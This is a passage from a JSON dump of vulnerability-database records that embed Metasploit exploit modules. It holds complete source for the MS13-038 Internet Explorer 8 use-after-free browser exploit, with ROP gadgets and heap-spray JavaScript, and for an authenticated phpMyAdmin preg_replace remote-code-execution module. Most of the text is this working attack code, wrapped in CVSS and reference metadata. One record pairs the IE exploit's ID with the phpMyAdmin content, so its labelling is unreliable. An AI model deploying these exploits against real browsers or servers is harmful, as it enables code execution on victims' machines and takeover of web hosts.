https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-29T14:30:49", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 67}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "45dc93adb3992cf62f488dd0856826ea", "type": "metasploit", "bulletinFamily": "exploit", "title": "phpMyAdmin Authenticated Remote Code Execution via preg_replace()", "description": "This module exploits a PREG_REPLACE_EVAL vulnerability in phpMyAdmin's replace_prefix_tbl within libraries/mult_submits.inc.php via db_settings.php This affects versions 3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3. PHP versions > 5.4.6 are not vulnerable.\n", "published": "2013-04-26T14:42:26", "modified": "2017-07-24T13:26:21", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3238", "http://www.waraxe.us/advisory-103.html", "http://www.phpmyadmin.net/home_page/security/PMASA-2013-2.php"], "cvelist": ["CVE-2013-3238"], "lastseen": "2019-06-08T12:34:56", "history": [], "viewCount": 117, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1347"]}, {"type": "symantec", "idList": ["SMNTC-59641", "SMNTC-38195", "SMNTC-50218", "SMNTC-59162", "SMNTC-58238"]}, {"type": "seebug", "idList": ["SSV:60781", "SSV:60790"]}, {"type": "threatpost", "idList": ["THREATPOST:4AFF5B3A848221B1D20C4D3441C38E47", "THREATPOST:E326C2EB9D5EFCB0D22498536DBFD41C", "THREATPOST:E22638A2E1CC5775D0EA1AF91EFFF450", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:0AFCC83E8C58D8FF486D59E8F7E64FBB", "THREATPOST:B8DB71E5E0488AEEA372885905AC2E7C"]}, {"type": "saint", "idList": ["SAINT:530FA87FA097C35D9629E058CE3C1589", "SAINT:ADB3400FCF70345A44024ACACFAE55FE", "SAINT:3EF0C66878E70BB3C355385365B1DFBF"]}, {"type": "zdt", "idList": ["1337DAY-ID-20741"]}, {"type": "exploitdb", "idList": ["EDB-ID:25294"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803395", "OPENVAS:803395"]}, {"type": "cert", "idList": ["VU:237655"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121542"]}, {"type": "nessus", "idList": ["SMB_KB2847140.NASL", "SMB_NT_MS13-038.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13082"]}], "modified": "2019-05-28T20:29:44"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/phpmyadmin_preg_replace.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'phpMyAdmin Authenticated Remote Code Execution via preg_replace()',\n 'Description' => %q{\n This module exploits a PREG_REPLACE_EVAL vulnerability in phpMyAdmin's\n replace_prefix_tbl within libraries/mult_submits.inc.php via db_settings.php\n This affects versions 3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3.\n PHP versions > 5.4.6 are not vulnerable.\n },\n 'Author' =>\n [\n 'Janek \"waraxe\" Vind', # Discovery\n 'Ben Campbell' # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2013-3238' ],\n [ 'PMASA', '2013-2'],\n [ 'waraxe', '2013-SA#103' ],\n [ 'EDB', '25003'],\n [ 'OSVDB', '92793'],\n [ 'URL', 'http://www.waraxe.us/advisory-103.html' ],\n [ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2013-2.php' ]\n ],\n 'Privileged' => false,\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Payload' =>\n {\n 'BadChars' => \"&\\n=+%\",\n # Clear out PMA's error handler so it doesn't lose its mind\n # and cause ENOMEM errors and segfaults in the destructor.\n 'Prepend' => \"function foo($a,$b,$c,$d,$e){return true;};set_error_handler(foo);\"\n },\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Apr 25 2013'))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"Base phpMyAdmin directory path\", '/phpmyadmin/']),\n OptString.new('USERNAME', [ true, \"Username to authenticate with\", 'root']),\n OptString.new('PASSWORD', [ false, \"Password to authenticate with\", ''])\n ])\n end\n\n def check\n begin\n res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/js/messages.php') })\n rescue\n vprint_error(\"Unable to connect to server.\")\n return CheckCode::Unknown\n end\n\n if res.code != 200\n vprint_error(\"Unable to query /js/messages.php\")\n return CheckCode::Unknown\n end\n\n php_version = res['X-Powered-By']\n if php_version\n vprint_status(\"PHP Version: #{php_version}\")\n if php_version =~ /PHP\\/(\\d)\\.(\\d)\\.(\\d)/\n if $1.to_i > 5\n return CheckCode::Safe\n else\n if $1.to_i == 5 and $2.to_i > 4\n return CheckCode::Safe\n else\n if $1.to_i == 5 and $2.to_i == 4 and $3.to_i > 6\n return CheckCode::Safe\n end\n end\n end\n end\n else\n vprint_status(\"Unknown PHP Version\")\n end\n\n if res.body =~ /pmaversion = '(.*)';/\n print_status(\"phpMyAdmin version: #{$1}\")\n case $1.downcase\n when '3.5.8.1', '4.0.0-rc3'\n return CheckCode::Safe\n when '4.0.0-alpha1', '4.0.0-alpha2', '4.0.0-beta1', '4.0.0-beta2', '4.0.0-beta3', '4.0.0-rc1', '4.0.0-rc2'\n return CheckCode::Appears\n else\n if $1.starts_with? '3.5.'\n return CheckCode::Appears\n end\n\n return CheckCode::Detected\n end\n end\n\n CheckCode::Safe\n end\n\n def exploit\n # Always display target info\n print_status(check[1])\n\n uri = target_uri.path\n print_status(\"Grabbing CSRF token...\")\n response = send_request_cgi({ 'uri' => uri})\n if response.nil?\n fail_with(Failure::NotFound, \"Failed to retrieve webpage.\")\n end\n\n if (response.body !~ /\"token\"\\s*value=\"([^\"]*)\"/)\n fail_with(Failure::NotFound, \"Couldn't find token. Is URI set correctly?\")\n else\n print_good(\"Retrieved token\")\n end\n\n token = $1\n post = {\n 'token' => token,\n 'pma_username' => datastore['USERNAME'],\n 'pma_password' => datastore['PASSWORD']\n }\n\n print_status(\"Authenticating...\")\n\n login = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(uri, 'index.php'),\n 'vars_post' => post\n })\n\n if login.nil?\n fail_with(Failure::NotFound, \"Failed to retrieve webpage.\")\n end\n\n if login.redirect?\n token = login.redirection.to_s.scan(/token=(.*)[&|$]/).flatten.first\n else\n fail_with(Failure::NotFound, \"Couldn't find token. Wrong PMA version?\")\n end\n\n cookies = login.get_cookies\n\n login_check = send_request_cgi({\n 'uri' => normalize_uri(uri, 'index.php'),\n 'vars_get' => { 'token' => token },\n 'cookie' => cookies\n })\n\n if login_check.body =~ /Welcome to/\n fail_with(Failure::NoAccess, \"Authentication failed\")\n else\n print_good(\"Authentication successful\")\n end\n\n db = rand_text_alpha(3+rand(3))\n send_request_cgi({\n 'uri'\t=> normalize_uri(uri, 'db_structure.php'),\n 'method' => 'POST',\n 'cookie' => cookies,\n 'vars_post' => {\n 'query_type' => 'replace_prefix_tbl',\n 'db' => db,\n 'selected[0]' => db,\n 'token' => token,\n 'from_prefix' => \"/e\\0\",\n 'to_prefix' => payload.encoded,\n 'mult_btn' => 'Yes'\n }\n },1)\n end\nend\n\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-08T12:34:56", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 68}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "f78b81be9ef5cef8ddee187a9e7948cc", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.\n", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1347", "http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx", "http://r-7.co/IE8-DOL"], "cvelist": ["CVE-2013-1347"], "lastseen": "2019-06-08T14:49:40", "history": [], "viewCount": 118, "enchantments": {"score": {"value": 9.5, "vector": "NONE", "modified": "2019-06-08T14:49:40"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1347"]}, {"type": "symantec", "idList": ["SMNTC-59641", "SMNTC-58238", "SMNTC-59162", "SMNTC-38195", "SMNTC-50218"]}, {"type": "seebug", "idList": ["SSV:60781", "SSV:60790"]}, {"type": "saint", "idList": ["SAINT:3EF0C66878E70BB3C355385365B1DFBF", "SAINT:530FA87FA097C35D9629E058CE3C1589", "SAINT:ADB3400FCF70345A44024ACACFAE55FE"]}, {"type": "nessus", "idList": ["SMB_NT_MS13-038.NASL", "SMB_KB2847140.NASL"]}, {"type": "threatpost", "idList": ["THREATPOST:E326C2EB9D5EFCB0D22498536DBFD41C", "THREATPOST:4AFF5B3A848221B1D20C4D3441C38E47", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:E22638A2E1CC5775D0EA1AF91EFFF450", "THREATPOST:0AFCC83E8C58D8FF486D59E8F7E64FBB", "THREATPOST:B8DB71E5E0488AEEA372885905AC2E7C"]}, {"type": "zdt", "idList": ["1337DAY-ID-20741"]}, {"type": "cert", "idList": ["VU:237655"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803395", "OPENVAS:803395"]}, {"type": "exploitdb", "idList": ["EDB-ID:25294"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121542"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13082"]}], "modified": "2019-06-08T14:49:40"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-08T14:49:40", "differentElements": ["sourceData"], "edition": 69}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "3af1e8cacec6d7f73945d0057d90d2ee", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.\n", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1347", "http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx", "http://r-7.co/IE8-DOL"], "cvelist": ["CVE-2013-1347"], "lastseen": "2019-06-17T02:13:30", "history": [], "viewCount": 118, "enchantments": {"score": {"value": 9.2, "vector": "NONE", "modified": "2019-06-17T02:13:30"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1347"]}, {"type": "symantec", "idList": ["SMNTC-59641", "SMNTC-50218", "SMNTC-58238", "SMNTC-59162", "SMNTC-38195"]}, {"type": "seebug", "idList": ["SSV:60781", "SSV:60790"]}, {"type": "openvas", "idList": ["OPENVAS:803395", "OPENVAS:1361412562310803395"]}, {"type": "nessus", "idList": ["SMB_KB2847140.NASL", "SMB_NT_MS13-038.NASL"]}, {"type": "saint", "idList": ["SAINT:ADB3400FCF70345A44024ACACFAE55FE", "SAINT:3EF0C66878E70BB3C355385365B1DFBF", "SAINT:530FA87FA097C35D9629E058CE3C1589"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121542"]}, {"type": "threatpost", "idList": ["THREATPOST:E326C2EB9D5EFCB0D22498536DBFD41C", "THREATPOST:4AFF5B3A848221B1D20C4D3441C38E47", "THREATPOST:E22638A2E1CC5775D0EA1AF91EFFF450", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:0AFCC83E8C58D8FF486D59E8F7E64FBB", "THREATPOST:B8DB71E5E0488AEEA372885905AC2E7C"]}, {"type": "zdt", "idList": ["1337DAY-ID-20741"]}, {"type": "cert", "idList": ["VU:237655"]}, {"type": "exploitdb", "idList": ["EDB-ID:25294"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13082"]}], "modified": "2019-06-17T02:13:30"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-17T02:13:30", "differentElements": ["sourceData"], "edition": 70}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "f78b81be9ef5cef8ddee187a9e7948cc", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.\n", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1347", "http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx", "http://r-7.co/IE8-DOL"], "cvelist": ["CVE-2013-1347"], "lastseen": "2019-06-17T14:37:10", "history": [], "viewCount": 118, "enchantments": {"score": {"value": 9.5, "vector": "NONE", "modified": "2019-06-17T14:37:10"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1347"]}, {"type": "symantec", "idList": ["SMNTC-59641", "SMNTC-59162", "SMNTC-58238", "SMNTC-50218", "SMNTC-38195"]}, {"type": "seebug", "idList": ["SSV:60781", "SSV:60790"]}, {"type": "threatpost", "idList": ["THREATPOST:E326C2EB9D5EFCB0D22498536DBFD41C", "THREATPOST:4AFF5B3A848221B1D20C4D3441C38E47", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:E22638A2E1CC5775D0EA1AF91EFFF450", "THREATPOST:B8DB71E5E0488AEEA372885905AC2E7C", "THREATPOST:0AFCC83E8C58D8FF486D59E8F7E64FBB"]}, {"type": "nessus", "idList": ["SMB_NT_MS13-038.NASL", "SMB_KB2847140.NASL"]}, {"type": "saint", "idList": ["SAINT:3EF0C66878E70BB3C355385365B1DFBF", "SAINT:ADB3400FCF70345A44024ACACFAE55FE", "SAINT:530FA87FA097C35D9629E058CE3C1589"]}, {"type": "openvas", "idList": ["OPENVAS:803395", "OPENVAS:1361412562310803395"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121542"]}, {"type": "exploitdb", "idList": ["EDB-ID:25294"]}, {"type": "zdt", "idList": ["1337DAY-ID-20741"]}, {"type": "cert", "idList": ["VU:237655"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13082"]}], "modified": "2019-06-17T14:37:10"}}, 